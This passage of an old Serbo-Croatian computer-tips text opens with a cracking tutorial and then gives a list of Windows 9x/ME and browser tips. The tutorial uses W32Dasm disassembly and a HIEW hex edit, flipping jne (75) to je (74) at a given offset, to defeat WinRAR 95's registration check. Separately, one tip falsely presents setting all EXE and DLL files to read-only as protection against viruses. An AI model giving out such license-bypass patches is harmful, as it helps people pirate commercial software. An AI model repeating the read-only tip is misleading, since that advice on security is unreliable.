pogresan registracijski cod.
Ako ste sve ispravno uradili dobicete na ekranu ovo:
:00413A8F 6A6A push 0000006A
:00413A91 E863640000 call 00419EF9
:00413A96 59 pop ecx
:00413A97 50 push eax
:00413A98 FF7508 push [ebp+08]
*ReferenceTo:USER32.MessageBoxA,Ord:0000h
|
:00413A9B E8120B0100 Call 004245B2
:00413AA0 33C0 xor eax, eax
:00413AA2 A358674200 mov dword ptr [00425758], eax
:00413AA7 A338564200 mov dword ptr [00425638], eax
:00413AAC A34C564200 mov dword ptr [0042564C], eax
:00413AB1 EB56 jmp 00413B09
* P o s s i b l e S t r i n g D a t a R e f f r o m D a t a O b j - > " Wi n R A R
"
* R e f e r e n c e T o : U S E R 3 2 . S e t Wi n d o wT e x t A , O r d : 0 0 0
0h
*PossibleReferencetoStringResourceID=00048
:"normal"
*PossibleReferencetoDialog:ARCINFODLG,CONT
ROL_ID:006C,""
Asm code ide od vrha na prema dole sve dok ne naidje na kraj coda ili
gresku u codu.To znaci da jne/je komandu moramo promijeniti koja je
negdje gore.
Ali kako cemo znati koja je? Sad mozemo pokusati promijeniti svaku i
vidjeti ili mozemo upotrijebiti "Goto Cd loc" dugme koje se nalazi na
vrhu.Kada kliknemo na njega mali prozor ce se pojaviti.Na desnoj strani
prozora ce se pojaviti text box "Code offset (HEX)" Sada bacimo pogled
na asm-code.Vidjecemo liniju "* Referenced by a (U)nconditional ili
(C)onditional Jump At Adress:" linija pored,na njoj se nalazi adresa koju
moramo znati "|:00413A82 (C)" To je broj koji moramo staviti u cod
lokacijski prozor 00413A82.Na ovoj adresi cemo pronaci "jump" skok
koji ce slati svaki put error poruki kada ukucamo pogresan cod.Kliknite
na Ok u cod lokacijskom prozoru.
Sad smo opet negdje u asm-codu.Bar je na liniji koja nam dopusta da
skacemo na poruke.To je jne (jump if not equal).Bar ce promijeniti svoju
boju u zeleno.Sada pogledaj na kraj ekrana.Tu je linija koja izgleda kao:
34985 Pg 467 of 998 Code Data @:00413A82@Offset00013082h u
Fajlu:Winrar95.w32
Jedna stvar koju moramo zapamtiti je broj poslje @offset.To je
00013082.
Sada idi na HIEW (netrebas zatvarati W32Dasm89) pod HIEW-om otvori
WinRAR95.exe.Klikni na F4 i poslje toga izaberi "decode".Sada mozemo
vidjeti sve te jne/je/eax .. komande i klikni F5.Na vrhi lijevom cosku
mozes staviti @offset broj.
Sad klikni F3.Sad smo u mogucnosti da promijenimo vrijednosti.
Promijeni od 75(jne) na 74 (je) i klikni na F9.Onda klikni F10.
Promijenili smo vrijednosti jne. Sada mozemo isprobati da li
radi.Pokrenucemo program otici do registration ukucati bilo kakav cod ili
ime i sta ce biti?
Pojavice se prozor koji ce vam reci da je registracija uspjesna.
Zapamtite ako zelimo manipulisati exe fajlovima ka Winrar moramo ga
zatvoriti na Windows desktopu ili cemo dobiti poruku "error only read
mode"
* AniGif.ocx
* Cracking
------------------------------------------------------------------
*-*-*-*-*--- Windows trikovi ---*-*-*-*-*-
*-*-*-*-*-*
U nastavku slijedi jos Windows trikova iako ovaj gore nije licio windows
triku, al et...sta je tu je...
Da li ste znali?
Da mozete da ukucate rijec u Adres baru i pritiskajuci CTRL+ENTER
kompjuter
automatski dodaje http://www.com na tu Vasu rijec.
Da trazite nesto putem adres bara ukucajte go, find ili ? i onda rijec
koju zelite naci...
Koji je dobar nacin da se zastitite od virusa kada vec nemate neki anti-
virus program? Idite na Start/Find i nadjite sve fajlove sa ekstenzijom
EXE i DLL. Selektujte ih, kliknite desnim dugmetom na njih i izaberite
Properties. Pod Attributes selektujte Read-only i onda na OK. Od sada se
fajlovi sa ekstenzijom EXE i DLL, koji su inace meta virusa, ne mogu
menjati posto se oni, od sada, samo mogu citati ( Read-only). Ovakva
vrsta zastite predstavlja problem za update programe tako da pre nego
sto update-ujete morate iskljuciti Read-only.
Budite obazrivi da kada saljete e-mail, fajl koji ste prikacili (attachment)
povecava se za oko 30% a to nije malo. Treba voditi racuna da kada
narucujete fajlove na email, preko npr. emailfile.com, treba da dodate
ovih 30% na originalnu velicinu fajla. Personal Mailbox na EUnetu je
4MB sto ce reci da max velicina fajla koji moze da vam stigne je oko
3000KB.
Koliko ste puta u browseru videli gresku 404-File not found? Ukoliko
vam je zaista stalo da vidite tu stranicu, stavite URL u clipboard i idite na
sajt http://www.google.com/ i pod pretragom Pastujte problematicni
URL. Google ce pronaci sajt a na vama je da kliknete na Cached link gde
cete videti taj URL iz Googleovog kesa.
Kako pronaci sliku na internetu koja se zove npr. FOTKA? Uz Alta Vistu
sve je moguce. Dovoljno je da u search fieldu otkucate 'image:fotka'
Doslo je vreme prvom triku za Windows ME. Kada neki program 'pukne'
obicno kliknete na Details u nadi da cete saznati sta je prouzrokovalo
pad programa. Medjutim, ljudi iz MSa su se odlucili da ukinu dugme
Details iz ko zna kojih razloga, ali kombinacija tastera ALT+D dace vam
ono sto ste vec navikli da vidite - detalje.
Kako saznati koliko puta ste startovali neki program ili igru? Dovoljno je
samo da pogledate fajl 'OPTLOG.TXT' i sve sto ste dosad startovali
videcete upisano i odbrojano. Inace, ovaj fajl koristi MS Scan Disk da bi
fajlove koje najcesce koristite stavio na pocetak diska jer ce tada biti
brze procitani.
Dok Disk Defragmenter radi svoj posao startovanje Screen Savera nije
preporucljivo jer ce posao morati da se radi iz pocetka. Da ne bi ste
vrteli misa ukrug za vreme defragmentacije, posegnite za elegantnijem
resenju. Sa Regeditom idite do HKEY_CURRENT_USER \ Software \
Microsoft\ Windows \ CurrentVersion \ Applets i napravite novi key
"Defrag". Pod njim napravite key "Settings" a unutar njega novi key
"DisableScreenSaver" i dodelite mu vrednost "Yes". Sledeci put kada se
startuje Defrag, Screen Saver ce biti deaktiviran.
Sigurno ste vec sto puta culi o Cookies-ima i o njihovom uticaju na vasu
privatnost dok surfujete webom. Standardna je preporuka da ih sa
vremena na vreme obrisete, ali time mozete dosta izgubiti na komforu
pri surfovanju webom, pogotovo na onim sajtovima koje cesto
posecujete. U IE5 postoji zgodna opcija 'Export Cookies' koja vas moze
spasti nevolja. Pre nego sto obrisete Cookie idite na File/ Import Export
i izaberite 'Export Cookies' i snimite ga u fajl. Ukoliko nesto ne bude
valjalo posle brisanja sa komandom Import mozete sve vratiti u
predjasnje stanje.
Koliko puta ste, surfujuci webom, videli neku jako dobru Macromedia
Flash animaciju a niste bili u mogucnosti da je snimite jer takva opcija
jednostavno ne postoji? Resenje ovog problema je da dok u browseru
gledate Flash animaciju, pomocu Find komande, potrazite *.SWF fajlove
i prekopirajte ih u neki drugi folder. Najverovatnije taj fajl necete moci
otrvoriti duplim klikom na njega nego cete ga uz pomoc drag&dropa
prebaciti u IE a on ce vec uraditi svoj deo posla.
Da li ste ikada naleteli na neke brojke tipa 404 dok ste surfovali webom?
404 ustvari znaci da sajt nije nadjen, 401 -neovlascen zahtev, 402
-obavestenje da je potrebna uplata, 403 - zabranjen pristup, 408 -time-
out zahteva, 500 - greska u serveru(internom), 501 -non-implemented
server-side facility, 503- preopterecen server
Koji je najbrzi nacin kreiranja shortcuta? Ne znam, ali ovaj sigurno treba
uzeti u obzir. Dok ste u Win Exploreru odvucite ikonu iz gornjeg levog
ugla na desktop i dobicete shortcut za folder u kojem ste se nalazili. Ovo
isto mozete koristiti i u IE da bi na najlaksi nacin dobili shortcut na
desktopu za odredjeni URL.
Znate li Easter Egg Helpa Windowsa 95? Idite na Start/ Help i izaberite
Find. Ukoliko dosad niste napravili index bazu napravite je. Pod Options
treba da vam bude ukljuceno "All the words you typed in any order" i
"begin with the characters you type" a ostalo nije bitno. Kliknite na OK.
Pod Find otkucajte "Who knows who built this tool?" (bez navodnika sa
velikim W) i drzite SHIFT i CTRL pa kliknite na Clear. Opet idite pod
Options ali ovaj put stavite "At least one of the words you typed" i
"contain the characters you type". Kliknite na OK pa otkucajte "The
Shadow knows!" (bez navodnika sa velikim T i S). Drzite SHIFT i CTRL pa
opet Clear i Easter Egg je tu!
Dok ste citali postu u Outlook Expressu pukao vam je sistem ili mozda
nestala struja? Po sledecom startovanju sistema startovace vam se Scan
Disk i naci ce gresku u Outlook-ovom history fajlu. Popravite ga. Kada
budete startovali OE, poruku koju ste citali necete moci da vidite zbog
toga sto OE nije bio propisno ugasen. Ali ovo ne treba da vas plasi jer
poruka je jos uvek tu. Dovoljno je samo da klikete na bilo koji drugi e-
mail pa posle toga ponovo na problematicni i sada nece biti problema.
Ukoliko necete da vam se automatski startuje CD, drzite SHIFT taster pri
ubacivanju CD-a.
To je vecina trikova koji postoje u windowsima, ali ima njih jos puno koji
su ostali ne istrazeni ali i oni ce uskoro biti na ovim stranicama....uskoro
ocekujte nastavak ovih trikova naravno dok odmorim malkice prste.
P.S. Htio bih da napomenem da ovo nisu sve moji trikovi oni su skidani
sa svih strana pomalo...
------------------------------------------------------------------